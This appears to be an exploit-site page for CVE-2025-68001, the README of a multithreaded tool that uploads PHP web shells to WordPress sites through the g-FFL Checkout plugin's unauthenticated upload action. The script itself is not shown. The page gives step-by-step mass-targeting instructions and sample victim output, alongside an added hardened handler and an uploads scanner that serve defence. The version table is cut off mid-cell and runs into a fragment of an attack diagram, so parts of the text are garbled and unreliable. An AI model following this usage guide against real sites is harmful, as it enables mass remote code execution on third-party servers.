## https://sploitus.com/exploit?id=29E7A24C-53B5-5820-9D6C-B597E8A0BDF6
# CVE-2025-68001
WordPress g-FFL Checkout Plugin <= 2.1.0 is vulnerable to a high priority Arbitrary File Upload


```
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 
```



[![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/KNxploited)
[![CVE](https://img.shields.io/badge/CVE-2025--68001-red?style=for-the-badge&logo=cve&logoColor=white)](https://vulners.com/cve/CVE-2025-68001)
[![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://python.org)
[![License](https://img.shields.io/badge/License-Educational%20Only-yellow?style=for-the-badge)](#-disclaimer)



> 📡 **Stay ahead of the curve.**
> Join **[@KNxploited](https://t.me/KNxploited)** on Telegram: your exclusive source for the latest CVEs, zero-days, and cutting-edge exploit research. Updated constantly. Not for everyone.



---

## 📋 Overview

**CVE-2025-68001** is a critical **Unauthenticated Arbitrary File Upload** vulnerability discovered in the **g-FFL Checkout** WordPress plugin by **garidium**.

The vulnerability allows an unauthenticated remote attacker to upload arbitrary files, including web shells, to the target server via the `ffl_upload_document` AJAX action, leading to **full Remote Code Execution (RCE)**.

| Field              | Details                          |
|--------------------|----------------------------------|
| **CVE ID**         | CVE-2025-68001                   |
| **Plugin**         | g-FFL Checkout (`g-ffl-checkout`)|
| **Affected Versions** | `n/a` through ` |

```
      document_type=document
      document=
      ↓
   Server stores the file without extension or MIME validation

3. Parse JSON response
      ↓
   Extract uploaded file path / unique filename

4. Access uploaded shell via HTTP
      ↓
   Remote Code Execution achieved ✔️
```

The plugin exposes an AJAX endpoint `ffl_upload_document` that:
- Accepts file uploads with no authentication check
- Performs no server-side file type validation
- Returns the stored file path in its JSON response

---

## 🔧 Requirements

Install all dependencies before running:

```bash
pip install requests rich
```

| Dependency | Purpose                          |
|------------|----------------------------------|
| `requests` | HTTP requests & session handling |
| `rich`     | Terminal UI, progress bars, panels |
| `threading` | Multi-threaded target processing (Python standard library, nothing to install) |

> Python **3.8+** is required.

---

## 📂 File Structure

```
CVE-2025-68001/
├── CVE-2025-68001.py       # Main exploit script
├── shell.php               # Web shell to upload (you provide this)
├── list.txt                # Target URLs (one per line)
└── success_results.txt     # Auto-generated results output
```

---

## 🚀 Usage

### Step 1: Prepare Your Targets

Create a `list.txt` file with one target URL per line:

```
https://target1.com
https://target2.com
http://target3.com/wordpress
```

> The script automatically prepends `http://` if no scheme is provided.

---

### Step 2: Prepare Your Shell

Place your PHP web shell in the same directory. Example minimal shell:

```php

```

Save it as `shell.php` (or any name; you'll be prompted to enter it).

---

### Step 3: Run the Exploit

```bash
python CVE-2025-68001.py
```

You will be prompted interactively:

```
Enter targets file name (default: list.txt):
> list.txt

Enter shell file name to upload (default: shell.php):
> shell.php

Enter number of threads (default: 50):
> 20
```

---

### Step 4: Review Results

Successful exploits are saved automatically to `success_results.txt`:

```
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php
```

Each line contains:
- Target URL
- Stored file path on server
- Unique filename assigned by server
- Original uploaded filename

---

## ๐Ÿ–ฅ๏ธ Script Parameters Reference

| Prompt                  | Default      | Description                              |
|-------------------------|--------------|------------------------------------------|
| Targets file            | `list.txt`   | File containing target URLs              |
| Shell file              | `shell.php`  | PHP shell to upload to the target        |
| Number of threads       | `50`         | Concurrent workers (max: 50)             |

---

## 📊 Output Example

```
✔  https://victim.com  — /checkout reachable. Trying exploit...

┌─────────────────────────────────────────────────────┐
│                      Success                        │
│  https://victim.com                                 │
│  Original Name:  shell.php                          │
│  Unique Name:    a7f3c1d9e.php                      │
│  Stored Path:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

All targets processed ✔️. Results saved to: success_results.txt
```

---

## ๐Ÿ” Vulnerable Code Path (Technical)

The vulnerability resides in the plugin's AJAX handler registered without capability checks:

```php
// Abridged illustration of the handler: no authentication or capability check,
// because the action is registered on the wp_ajax_nopriv_ hook (anonymous callers)
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce verified from /checkout page (publicly accessible)
    // No MIME type validation
    // No extension whitelist/blacklist
    // $upload_path: destination chosen by the plugin (how it is built is omitted here)
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}
```
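As an added example (not the plugin's code and not part of this repository), here is the same handler rewritten the way a defender would want it: registered only for logged-in users, gated by a capability check and an action-specific nonce, restricted to an allowlist of document types that is checked against file content, stored under a server-generated name, and answering with an opaque identifier instead of the filesystem path. It also covers the "server-side file type validation" and "strict extension whitelisting" items from the Mitigation section. The function name `ffl_upload_document_hardened`, the allowlist, the `upload_files` capability and the `ffl_document_` user-meta key are assumptions for illustration; every `wp_*`/`check_ajax_referer` call is a WordPress core API.

```php
<?php
// Added example (hypothetical hardened handler, not the plugin's own code).

// Only logged-in users reach this handler; the wp_ajax_nopriv_ hook from the
// vulnerable version is deliberately NOT registered.
add_action( 'wp_ajax_ffl_upload_document', 'ffl_upload_document_hardened' );

/**
 * Document types a customer may legitimately upload (assumed allowlist;
 * adjust to the real business requirement). Keys are extensions, values MIME types.
 */
function ffl_allowed_document_mimes() {
    return array(
        'pdf'      => 'application/pdf',
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
    );
}

function ffl_upload_document_hardened() {
    // 1. Nonce bound to this action (sent in the "nonce" field). Dies on failure.
    check_ajax_referer( 'ffl_upload_document', 'nonce' );

    // 2. Capability check: this, not the nonce, is what stops anonymous callers.
    //    'upload_files' is an assumption; pick the capability your flow needs.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    if ( empty( $_FILES['document'] ) || ! is_uploaded_file( $_FILES['document']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'No file uploaded' ), 400 );
    }

    $file  = $_FILES['document'];
    $mimes = ffl_allowed_document_mimes();

    // 3. Validate extension AND content: wp_check_filetype_and_ext() inspects the
    //    actual bytes for images and returns empty ext/type on any mismatch.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( array( 'message' => 'File type not allowed' ), 415 );
    }

    // 4. Let WordPress move the file, forcing the same allowlist and a random
    //    server-generated name; the client-supplied filename is never used.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $overrides = array(
        'test_form'                => false,   // not a wp_handle_upload form post
        'mimes'                    => $mimes,
        'unique_filename_callback' => function ( $dir, $name, $ext ) {
            // $ext already carries the leading dot of the validated extension
            return wp_generate_password( 32, false ) . $ext;
        },
    );
    $result = wp_handle_upload( $file, $overrides );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => 'Upload failed' ), 500 );
    }

    // 5. Keep the stored path server-side, keyed to the user, and return only
    //    an opaque reference: the filesystem path is never echoed to the client.
    $doc_id = wp_generate_uuid4();
    update_user_meta( get_current_user_id(), 'ffl_document_' . $doc_id, $result['file'] );
    wp_send_json_success( array( 'document_id' => $doc_id ) );
}
```

The nonce alone would not have fixed the original handler: the page notes that the nonce is obtainable from the public `/checkout` page, so `current_user_can()` is the control that actually excludes unauthenticated callers. If guest uploads are a hard business requirement, the content-based type check, random naming and a non-executable upload directory still apply; what must never be done is treating the `wp_ajax_nopriv_` hook plus a public nonce as an authorization gate.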

---

## ๐Ÿ›ก๏ธ Mitigation & Remediation

If you are a **site owner or developer**, take the following steps immediately:

- ✅ **Update** the `g-ffl-checkout` plugin to a patched version (> 2.1.0) if available
- ✅ **Disable** the plugin until a patch is confirmed
- ✅ **Restrict** execution permissions in upload directories (e.g., `.htaccess` rules)
- ✅ **Implement** server-side file type validation and strict extension whitelisting
- ✅ **Monitor** upload directories for suspicious `.php` files
- ✅ **Enable WAF** rules to block unauthenticated AJAX file upload requests
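For the "Monitor upload directories" item, the following is an added example (not from this repository or the plugin) of a read-only scanner a site owner can run from the command line against `wp-content/uploads`. It reports files whose name carries a server-executable extension anywhere in it (so `shell.php.jpg` is caught), and files whose first bytes contain a PHP open tag whatever their extension. The sample directory tree it builds is constructed for the demonstration; the function name `ffl_scan_uploads` and the extension list are assumptions.

```php
<?php
// Added example: standalone scanner for executable files in an uploads tree.
// Run as: php scan_uploads.php   (scans the constructed demo tree below)

/** Extensions that mod_php / PHP-FPM are commonly configured to execute (assumed list). */
const FFL_SCAN_EXEC_EXTS = array( 'php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'phps' );

/**
 * Walk $dir recursively and return one record per suspicious file.
 * A file is reported when any extension segment of its name is executable,
 * or when its leading bytes contain "<?php" / "<?=" regardless of extension.
 */
function ffl_scan_uploads( string $dir ): array {
    $findings = array();
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $iter as $path => $info ) {
        if ( ! $info->isFile() ) {
            continue;
        }
        $reasons = array();

        // Check every dotted segment after the base name, not just the last one.
        $segments = explode( '.', strtolower( $info->getFilename() ) );
        array_shift( $segments );
        foreach ( $segments as $ext ) {
            if ( in_array( $ext, FFL_SCAN_EXEC_EXTS, true ) ) {
                $reasons[] = "executable extension .$ext in name";
                break;
            }
        }

        // Content check on the first 4 KiB only, so large legitimate files stay cheap.
        $head = (string) file_get_contents( $path, false, null, 0, 4096 );
        if ( preg_match( '/<\?(php|=)/i', $head ) ) {
            $reasons[] = 'PHP open tag in file content';
        }

        if ( $reasons ) {
            $findings[] = array(
                'path'    => $path,
                'size'    => $info->getSize(),
                'mtime'   => date( 'c', $info->getMTime() ),
                'reasons' => $reasons,
            );
        }
    }
    return $findings;
}

// ---- constructed sample tree (deleted again at the end) ----
$root = sys_get_temp_dir() . '/ffl-scan-demo-' . getmypid();
mkdir( "$root/ffl", 0700, true );
file_put_contents( "$root/ffl/license.pdf",  "%PDF-1.4\n% constructed sample, benign\n" );
file_put_contents( "$root/ffl/a7f3c1.php",   "<?php echo 'constructed sample'; ?>" );
file_put_contents( "$root/ffl/photo.jpg",    "\xFF\xD8\xFF\xE0<?php /* tag inside an image */ ?>" );
file_put_contents( "$root/ffl/form.php.jpg", "GIF89a constructed sample" );

foreach ( ffl_scan_uploads( $root ) as $f ) {
    printf( "%s  %d bytes  %s\n    %s\n", $f['path'], $f['size'], $f['mtime'], implode( '; ', $f['reasons'] ) );
}
// license.pdf is not reported; a7f3c1.php, photo.jpg and form.php.jpg are.

// cleanup of the constructed tree
foreach ( glob( "$root/ffl/*" ) as $p ) {
    unlink( $p );
}
rmdir( "$root/ffl" );
rmdir( $root );
```

Point the scanner at the real uploads directory by replacing the constructed `$root` with the site path, and run it from cron with its output diffed against the previous run; a newly appearing hit under `uploads/ffl/` with an `.mtime` that matches a `POST /wp-admin/admin-ajax.php?action=ffl_upload_document` entry in the access log is the signature of the behaviour this page describes. The scanner complements, rather than replaces, a `.htaccess`/web-server rule that denies PHP execution under `wp-content/uploads`.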

---

## โš ๏ธ Disclaimer

```
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL AND AUTHORIZED
SECURITY RESEARCH PURPOSES ONLY.

By using this script, you explicitly agree to the following:

  • You have EXPLICIT written permission from the target system owner.
  • You are operating in a controlled lab or authorized penetration testing engagement.
  • You will NOT use this tool against any system you do not own or have legal
    authorization to test.
  • The author (Nxploited) holds ZERO liability for any damage, data loss,
    legal consequences, or misuse resulting from this tool.

Unauthorized use of this tool against systems without permission is ILLEGAL
and may violate laws including but not limited to:
  — Computer Fraud and Abuse Act (CFAA)
  — EU Directive on Attacks Against Information Systems
  — And equivalent laws in your jurisdiction.

USE RESPONSIBLY. HACK ETHICALLY.
```

---

## 👤 Author



| | |
|---|---|
| **Handle** | Nxploited |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |



> 🔔 **Follow [@KNxploited](https://t.me/KNxploited) on Telegram**
> to receive the latest vulnerability disclosures, exploit releases,
> and security research, before anyone else does.



---


  Built with precision by Nxploited · For educational use only